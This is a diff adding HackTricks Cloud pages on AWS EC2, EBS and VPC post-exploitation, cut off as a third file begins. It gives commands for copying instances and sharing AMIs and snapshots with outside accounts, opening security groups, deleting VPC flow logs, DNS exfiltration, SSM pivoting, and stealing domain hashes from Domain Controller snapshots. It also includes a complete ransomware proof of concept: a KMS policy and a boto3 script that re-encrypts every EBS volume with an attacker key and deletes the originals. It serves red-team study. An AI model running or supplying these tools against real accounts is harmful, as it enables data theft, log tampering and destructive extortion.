+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EC2 & VPC
+
+For more information check:
+
+{% content-ref url="../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %}
+[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/)
+{% endcontent-ref %}
+
+### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`
+
+VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\
+An attacker could abuse this to capture all the traffic and obtain sensitive information from it:
+
+For more information check this page:
+
+{% content-ref url="aws-malicious-vpc-mirror.md" %}
+[aws-malicious-vpc-mirror.md](aws-malicious-vpc-mirror.md)
+{% endcontent-ref %}
+
+### Copy Running Instance
+
+Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**:
+
+```shell
+# List instances
+aws ec2 describe-images
+
+# create a new image for the instance-id
+aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1  
+
+# add key to AWS
+aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1  
+
+# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
+aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
+
+# now you can check the instance 
+aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 
+
+# If needed : edit groups
+aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1
+
+# be a good guy, clean our instance to avoid any useless cost
+aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 
+aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
+```
+
+### EBS Snapshot dump
+
+**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\
+If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account:
+
+{% content-ref url="aws-ebs-snapshot-dump.md" %}
+[aws-ebs-snapshot-dump.md](aws-ebs-snapshot-dump.md)
+{% endcontent-ref %}
+
+### Data Exfiltration
+
+#### DNS Exfiltration
+
+Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**.
+
+* **VPC Flow Logs will not record this**.
+* You have no access to AWS DNS logs.
+*   Disable this by setting "enableDnsSupport" to false with:
+
+    `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>`
+
+#### Exfiltration via API calls
+
+An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs.
+
+### Open Security Group
+
+You could get further access to network services by opening ports like this:
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
+# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC
+```
+{% endcode %}
+
+### Privesc to ECS
+
+It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data.
+
+For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
+
+### Remove VPC flow logs
+
+```bash
+aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>
+```
+
+### SSM Port Forwarding
+
+Required permissions:
+- `ssm:StartSession`
+
+In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs.
+One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster.
+
+> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
+
+1. Install the SessionManagerPlugin on your machine
+2. Log in to the Bastion EC2 using the following command:
+
+```shell
+aws ssm start-session --target "$INSTANCE_ID"
+```
+
+3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script
+4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile
+5. Log in to EKS as the Bastion EC2:
+
+```shell
+aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>
+```
+
+6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost`
+7. Create an SSM tunnel as follows:
+
+```shell
+sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>
+```
+8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running:
+```shell
+kubectl get pods --insecure-skip-tls-verify 
+```
+
+Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks.
+
+Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
+
+
+### Share AMI
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
+```
+{% endcode %}
+
+### Search sensitive information in public and private AMIs
+
+* [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data.
+
+### Share EBS Snapshot
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
+```
+{% endcode %}
+
+### EBS Ransomware PoC
+
+A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it.
+
+First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption'
+
+```
+{
+    "Version": "2012-10-17",
+    "Id": "key-consolepolicy-3",
+    "Statement": [
+        {
+            "Sid": "Enable IAM User Permissions",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
+            },
+            "Action": "kms:*",
+            "Resource": "*"
+        },
+        {
+            "Sid": "Allow access for Key Administrators",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+            },
+            "Action": [
+                "kms:Create*",
+                "kms:Describe*",
+                "kms:Enable*",
+                "kms:List*",
+                "kms:Put*",
+                "kms:Update*",
+                "kms:Revoke*",
+                "kms:Disable*",
+                "kms:Get*",
+                "kms:Delete*",
+                "kms:TagResource",
+                "kms:UntagResource",
+                "kms:ScheduleKeyDeletion",
+                "kms:CancelKeyDeletion"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Sid": "Allow use of the key",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+            },
+            "Action": [
+                "kms:Encrypt",
+                "kms:Decrypt",
+                "kms:ReEncrypt*",
+                "kms:GenerateDataKey*",
+                "kms:DescribeKey"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Sid": "Outside Encryption",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": [
+                "kms:Encrypt",
+                "kms:Decrypt",
+                "kms:ReEncrypt*",
+                "kms:GenerateDataKey*",
+                "kms:DescribeKey",
+                "kms:GenerateDataKeyWithoutPlainText",
+                "kms:CreateGrant"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Sid": "Allow attachment of persistent resources",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+            },
+            "Action": [
+                "kms:CreateGrant",
+                "kms:ListGrants",
+                "kms:RevokeGrant"
+            ],
+            "Resource": "*",
+            "Condition": {
+                "Bool": {
+                    "kms:GrantIsForAWSResource": "true"
+                }
+            }
+        }
+    ]
+}
+```
+
+The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:
+
+* `kms:CreateGrant`
+* `kms:Decrypt`
+* `kms:DescribeKey`
+* `kms:GenerateDataKeyWithoutPlainText`
+* `kms:ReEncrypt`
+
+Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.
+
+![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459)
+
+Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
+
+This results in only encrypted EBS volumes left available in the account.
+
+![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220)
+
+Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now.
+
+![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e)
+
+Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy.
+
+```json
+{
+    "Version": "2012-10-17",
+    "Id": "key-consolepolicy-3",
+    "Statement": [
+        {
+            "Sid": "Enable IAM User Permissions",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:root"
+            },
+            "Action": "kms:*",
+            "Resource": "*"
+        },
+        {
+            "Sid": "Allow access for Key Administrators",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+            },
+            "Action": [
+                "kms:Create*",
+                "kms:Describe*",
+                "kms:Enable*",
+                "kms:List*",
+                "kms:Put*",
+                "kms:Update*",
+                "kms:Revoke*",
+                "kms:Disable*",
+                "kms:Get*",
+                "kms:Delete*",
+                "kms:TagResource",
+                "kms:UntagResource",
+                "kms:ScheduleKeyDeletion",
+                "kms:CancelKeyDeletion"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Sid": "Allow use of the key",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+            },
+            "Action": [
+                "kms:Encrypt",
+                "kms:Decrypt",
+                "kms:ReEncrypt*",
+                "kms:GenerateDataKey*",
+                "kms:DescribeKey"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Sid": "Allow attachment of persistent resources",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
+            },
+            "Action": [
+                "kms:CreateGrant",
+                "kms:ListGrants",
+                "kms:RevokeGrant"
+            ],
+            "Resource": "*",
+            "Condition": {
+                "Bool": {
+                    "kms:GrantIsForAWSResource": "true"
+                }
+            }
+        }
+    ]
+}
+```
+
+Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume.
+
+![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4)
+
+But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.
+
+![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0)
+
+This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day.
+
+```
+import boto3
+import argparse
+from botocore.exceptions import ClientError
+
+def enumerate_ec2_instances(ec2_client):
+    instances = ec2_client.describe_instances()
+    instance_volumes = {}
+    for reservation in instances['Reservations']:
+        for instance in reservation['Instances']:
+            instance_id = instance['InstanceId']
+            volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
+            instance_volumes[instance_id] = volumes
+    return instance_volumes
+
+def snapshot_volumes(ec2_client, volumes):
+    snapshot_ids = []
+    for volume_id in volumes:
+        snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
+        snapshot_ids.append(snapshot['SnapshotId'])
+    return snapshot_ids
+
+def wait_for_snapshots(ec2_client, snapshot_ids):
+    for snapshot_id in snapshot_ids:
+        ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])
+
+def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
+    new_volume_ids = []
+    for snapshot_id in snapshot_ids:
+        snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
+        volume_id = snapshot_info['VolumeId']
+        volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
+        availability_zone = volume_info['AvailabilityZone']
+
+        volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
+                                          Encrypted=True, KmsKeyId=kms_key_arn)
+        new_volume_ids.append(volume['VolumeId'])
+    return new_volume_ids
+
+def stop_instances(ec2_client, instance_ids):
+    for instance_id in instance_ids:
+        try:
+            instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
+            instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']
+
+            if instance_state == 'running':
+                ec2_client.stop_instances(InstanceIds=[instance_id])
+                print(f"Stopping instance: {instance_id}")
+                ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
+                print(f"Instance {instance_id} stopped.")
+            else:
+                print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")
+
+        except ClientError as e:
+            print(f"Error stopping instance {instance_id}: {e}")
+
+def detach_and_delete_volumes(ec2_client, volumes):
+    for volume_id in volumes:
+        try:
+            ec2_client.detach_volume(VolumeId=volume_id)
+            ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
+            ec2_client.delete_volume(VolumeId=volume_id)
+            print(f"Deleted volume: {volume_id}")
+        except ClientError as e:
+            print(f"Error detaching or deleting volume {volume_id}: {e}")
+
+
+def delete_snapshots(ec2_client, snapshot_ids):
+    for snapshot_id in snapshot_ids:
+        try:
+            ec2_client.delete_snapshot(SnapshotId=snapshot_id)
+            print(f"Deleted snapshot: {snapshot_id}")
+        except ClientError as e:
+            print(f"Error deleting snapshot {snapshot_id}: {e}")
+
+def replace_volumes(ec2_client, instance_volumes):
+    instance_ids = list(instance_volumes.keys())
+    stop_instances(ec2_client, instance_ids)
+
+    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+    detach_and_delete_volumes(ec2_client, all_volumes)
+
+def ebs_lock(access_key, secret_key, region, kms_key_arn):
+    ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)
+    
+    instance_volumes = enumerate_ec2_instances(ec2_client)
+    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
+    wait_for_snapshots(ec2_client, snapshot_ids)
+    create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
+    replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
+    delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed
+
+def parse_arguments():
+    parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
+    parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
+    parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
+    parser.add_argument('--region', required=True, help='AWS Region')
+    parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
+    return parser.parse_args()
+
+def main():
+    args = parse_arguments()
+    ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)
+
+    instance_volumes = enumerate_ec2_instances(ec2_client)
+    all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
+    snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
+    wait_for_snapshots(ec2_client, snapshot_ids)
+    create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
+    replace_volumes(ec2_client, instance_volumes)
+    delete_snapshots(ec2_client, snapshot_ids)
+
+if __name__ == "__main__":
+    main()
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
new file mode 100644
index 0000000000..4c0fa0e1cb
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
@@ -0,0 +1,174 @@
+# AWS - EBS Snapshot Dump
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Checking a snapshot locally
+
+```bash
+# Install dependencies
+pip install 'dsnap[cli]'
+brew install vagrant
+brew install virtualbox
+
+# Get snapshot from image
+mkdir snap_wordir; cd snap_workdir
+dsnap init
+## Download a snapshot of the volume of that instance
+## If no snapshot existed it will try to create one
+dsnap get <instance-id>
+dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a
+## Other way to get a snapshot
+dsnap list #List snapshots
+dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly
+
+# Run with vagrant
+IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtuabox
+IMAGE="<download_file>.img" vagrant ssh #Access the VM
+vagrant destroy #To destoy
+
+# Run with docker
+git clone https://github.com/RhinoSecurityLabs/dsnap.git
+cd dsnap
+make docker/build
+IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded
+```
+
+{% hint style="danger" %}
+**Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that:
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# Copy the snapshot
+aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"
+
+# View the snapshot info
+aws ec2 describe-snapshots --owner-ids self --region us-east-2
+
+# Download the snapshot. The ID is the copy from your account
+dsnap --region us-east-2 get snap-027da41be451109da
+
+# Delete the snapshot after downloading
+aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2
+```
+{% endcode %}
+
+For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/)
+
+You can do this with Pacu using the module [ebs\_\_download\_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots)
+
+## Checking a snapshot in AWS
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89
+```
+{% endcode %}
+
+**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup):
+
+Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes.
+
+To be able to perform this action, follow these commands:
+
+* Create an EBS volume to attach to the EC2 instance.
+* Ensure that the EBS volume and the instance are in the same zone.
+
+Step 2: The "attach volume" option is to be selected by right-clicking on the created volume.
+
+Step 3: The instance from the instance text box is to be selected.
+
+To be able to perform this action, use the following command:
+
+* Attach the EBS volume.
+
+Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`.
+
+Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`.
+
+If the output of the above command shows "/dev/xvdf: data", it means the volume is empty.
+
+Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs.
+
+Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume".
+
+To be able to perform this action, use the command `sudo mkdir /newvolume`.
+
+Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`.
+
+Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount.
+
+To be able to perform this action, use the following commands:
+
+* Change directory to `/newvolume`.
+* Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory.
+
+You can do this with Pacu using the module `ebs__explore_snapshots`.
+
+## Checking a snapshot in AWS (using cli)
+
+{% code overflow="wrap" %}
+```bash
+aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>
+
+# Attach new volume to instance
+aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>
+
+# mount the snapshot from within the VM
+
+sudo file -s /dev/sdh
+/dev/sdh: symbolic link to `xvdh'
+
+sudo file -s /dev/xvdh
+/dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63
+
+lsblk /dev/xvdh
+NAME     MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
+xvdh     202:112  0    8G  0 disk
+├─xvdh1  202:113  0  7.9G  0 part
+├─xvdh14 202:126  0    4M  0 part
+└─xvdh15 202:127  0  106M  0 part
+
+sudo mount /dev/xvdh1 /mnt
+
+ls /mnt
+```
+{% endcode %}
+
+## Shadow Copy
+
+Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+
+You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+
+## References
+
+* [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
new file mode 100644
index 0000000000..51e033417d
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md
@@ -0,0 +1,41 @@
+# AWS - Malicious VPC Mirror
+
+{% hint style="success" %}
